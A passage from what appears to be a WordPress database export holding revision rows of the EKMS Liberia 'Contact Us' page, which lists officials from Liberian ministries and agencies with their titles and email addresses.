href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine A\'jami</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 10:59:48','2022-09-20 10:59:48','',80,'https://ekmsliberia.info/?p=5096',0,'revision','',0),(5097,42,'2022-09-20 11:02:03','2022-09-20 11:02:03','','henry','','inherit','open','closed','','henry','','','2022-09-20 11:02:03','2022-09-20 11:02:03','',80,'https://ekmsliberia.info/wp-content/uploads/2022/09/henry.jpg',0,'attachment','image/jpeg',0),(5098,42,'2022-09-20 11:02:13','2022-09-20 11:02:13','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />														\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine A\'jami</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 11:02:13','2022-09-20 11:02:13','',80,'https://ekmsliberia.info/?p=5098',0,'revision','',0),(5099,42,'2022-09-20 11:02:14','2022-09-20 11:02:14','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" 